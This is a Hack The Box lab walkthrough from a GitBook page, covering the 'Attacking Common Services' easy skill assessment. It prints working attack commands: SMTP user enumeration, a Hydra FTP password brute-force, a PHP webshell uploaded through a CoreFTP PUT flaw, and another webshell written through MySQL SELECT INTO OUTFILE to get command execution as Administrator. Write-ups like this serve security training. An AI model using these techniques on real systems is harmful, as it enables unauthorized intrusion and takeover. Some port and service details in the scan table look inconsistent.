> For the complete documentation index, see [llms.txt](https://ganesha-hk.gitbook.io/offensive-security-writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ganesha-hk.gitbook.io/offensive-security-writeups/hack-the-box/attacking-common-services-task-1.md).

# Attacking Common Services (task 1)

## Skill Assessment (Easy) Walkthrough

> **HTB Module:** Attacking Common Services **Difficulty:** Easy **Goal:** Find the flag (`HTB{...}`) on the target server **Target:** inlanefreight.htb
>
> ![](https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FuPfve3Nng3v0fhFNy4a1%2Fimage.png?alt=media\&token=b3715e11-c749-4b37-beea-7250830ac466) ![](https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FTu2dfMr2wYljw4CvEU0Q%2Fimage.png?alt=media\&token=f3c09eec-7fa6-4a73-93c1-fb9d16d06785)

***

### 📌 Scenario

We were commissioned by **Inlanefreight** to conduct a penetration test against a server that manages **emails, customers, and their files**. A flag in the format `HTB{...}` has been placed somewhere on the server to prove successful access.

### 🎯 Target

```
IP     →  10.129.159.229
Domain →  inlanefreight.htb
```

### 🗺️ Attack Chain

```
Nmap → SMTP user enum (fiona) → Hydra FTP brute-force
  → FTP login → webserversinfo.txt → CoreFTP vuln (failed)
    → MySQL login → write PHP shell via SELECT INTO OUTFILE
      → RCE as Administrator → flag.txt 🏴
```

***

***

## Step 1 — Add Target to /etc/hosts

```bash
echo "10.129.159.229 inlanefreight.htb" >> /etc/hosts
```

***

## Step 2 — Nmap Scan

Scan the box to see what's running:

```bash
sudo nmap -sC -sV 10.129.159.229
```

Tons of stuff open:

| Port    | Service                           |
| ------- | --------------------------------- |
| 21/tcp  | FTP (Core FTP Server 2.0)         |
| 25/tcp  | SMTP (hMailServer smtpd)          |
| 80/tcp  | HTTP (Apache 2.4.53 / XAMPP)      |
| 87/tcp  | SMTP (hMailServer)                |
| 306/tcp | MySQL (MariaDB 5.5.5-10.4.24)     |
| 443/tcp | HTTPS (Core FTP HTTPS Server)     |
| 389/tcp | RDP (Microsoft Terminal Services) |

Can't login to FTP without creds. SMTP is running though — we can enumerate users.

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FuuaqjllD0QkKEFfUyH6M%2Fimg-000.png?alt=media&amp;token=262de09d-6a48-4542-b695-7a808009bc79" alt=""><figcaption></figcaption></figure>

> 📸 **Image 1** — Nmap scan (part 1) showing FTP, SMTP, HTTP, HTTPS ports with service versions

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F51yNjEz8vvkEe2xmYugX%2Fimg-001.png?alt=media&amp;token=fd755853-7add-498f-aafa-918196a45aef" alt=""><figcaption></figcaption></figure>

> 📸 **Image 2** — Nmap scan (part 2) showing MySQL (MariaDB), RDP, and additional service details

***

## Step 3 — SMTP User Enumeration

SMTP is running on port 25. Let's enumerate valid usernames using `smtp-user-enum` with RCPT mode:

```bash
smtp-user-enum -M RCPT -U users.list -D inlanefreight.htb -t 10.129.159.229
```

**Hit!** 🎯 Found a valid user:

```
10.129.159.229: fiona@inlanefreight.htb exists
```

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FoqFSfqb7SbSbDXmHJdUF%2Fimg-002.png?alt=media&amp;token=edd8689b-2d15-420d-96dc-32eb0ca5d25a" alt=""><figcaption></figcaption></figure>

> 📸 **Image 3** — smtp-user-enum RCPT scan finding `fiona@inlanefreight.htb` as a valid user

***

## Step 4 — Brute-Forcing FTP with Hydra

We got the username `fiona`. Tried brute-forcing SMTP first — no luck. Let's try FTP:

```bash
hydra -I -l fiona -P /usr/share/wordlists/rockyou.txt -f 10.129.159.229 ftp
```

**Got it!** 💰

```
[21][ftp] host: 10.129.159.229   login: fiona   password: 987654321
```

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FuEfVr31m0sXg8al1OeAU%2Fimg-003.png?alt=media&amp;token=3dbc672f-9492-42fa-92f7-1faccdaf1d4b" alt=""><figcaption></figcaption></figure>

> 📸 **Image 4** — Hydra brute-force cracking FTP credentials `fiona:987654321`

***

## Step 5 — FTP Login & Recon

Login to FTP with the creds:

```bash
ftp fiona@10.129.159.229
# password: 987654321
```

We find a file called `webserversinfo.txt` which tells us about the **CoreFTP vulnerability** and the web root path.

***

## Step 6 — CoreFTP Upload Attempt (Failed)

Tried exploiting the CoreFTP PUT vulnerability to upload a PHP webshell:

```bash
curl -k -X PUT -H "Host: 10.129.159.229" --basic -u fiona:987654321 \
  --data-binary '<?php system($_GET["cmd"]); ?>' \
  --path-as-is https://10.129.159.229/docs/shell.php
```

Server responds `200 OK` — file uploaded, but **executing the shell through the web server failed**. The CoreFTP web server doesn't process PHP.

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FW9mFWIupq8xOvA4D1Tuq%2Fimg-004.png?alt=media&amp;token=3b3e08c6-94cf-43d8-bbae-d0bb72c8e09d" alt=""><figcaption></figcaption></figure>

> 📸 **Image 5** — curl PUT request to CoreFTP uploading PHP shell (200 OK but execution fails)

***

## Step 7 — MySQL Login & Writing a Shell

Same creds work on MySQL! Login to MariaDB:

```bash
mysql -h 10.129.160.2 -u fiona -p987654321 --ssl=FALSE
```

Now use `SELECT INTO OUTFILE` to write a PHP webshell directly into the XAMPP web root (`C:/xampp/htdocs/`):

```sql
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/xampp/htdocs/shell.php';
```

```
Query OK, 1 row affected (0.239 sec)
```

Shell written! 🔥

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2F5tpUa47gsCrpf4Kkipop%2Fimg-005.png?alt=media&amp;token=1da6be04-7e07-4179-91e2-77dd8e29dc6b" alt=""><figcaption></figcaption></figure>

> 📸 **Image 6** — MySQL session writing PHP webshell to `C:/xampp/htdocs/shell.php` via SELECT INTO OUTFILE

***

## Step 8 — RCE as Administrator

Access the shell through the browser. Let's list the Administrator's desktop:

```
http://10.129.160.2/shell.php?cmd=dir C:\Users\Administrator\Desktop
```

We can see `flag.txt` sitting right there! We're running as **Administrator**.

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FdALg2IdANzdll0jLiRBR%2Fimg-006.png?alt=media&amp;token=89d5f727-9a0c-4b25-a697-03d1bfd032b7" alt=""><figcaption></figcaption></figure>

> 📸 **Image 7** — Webshell RCE listing Administrator's Desktop showing flag.txt

Now read the flag:

```
http://10.129.160.2/shell.php?cmd=type C:\Users\Administrator\Desktop\flag.txt
```

<figure><img src="https://2161282592-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Q3ckiibsN2y5dLrShvo%2Fuploads%2FLT98rq4hpph4bUuIQzGV%2Fimg-007.png?alt=media&amp;token=864a96d1-ff47-47eb-985a-b774c7b7f86f" alt=""><figcaption></figcaption></figure>

> 📸 **Image 8** — Flag captured! `HTB{t#3r...}` displayed in browser

***

## 🏆 Pwned!

From SMTP user enumeration to FTP brute-force to MySQL webshell — full admin RCE and flag captured.

#### Tools Used

| Tool             | Purpose                           |
| ---------------- | --------------------------------- |
| `nmap`           | Port scanning & service detection |
| `smtp-user-enum` | SMTP username enumeration (RCPT)  |
| `hydra`          | FTP brute-force                   |
| `ftp`            | FTP login & file retrieval        |
| `curl`           | CoreFTP PUT exploit attempt       |
| `mysql`          | MariaDB login & webshell writing  |
| Browser          | RCE via PHP webshell              |

***

> **GG 🏴** — SMTP enum → FTP creds → MySQL shell → Administrator RCE.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ganesha-hk.gitbook.io/offensive-security-writeups/hack-the-box/attacking-common-services-task-1.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
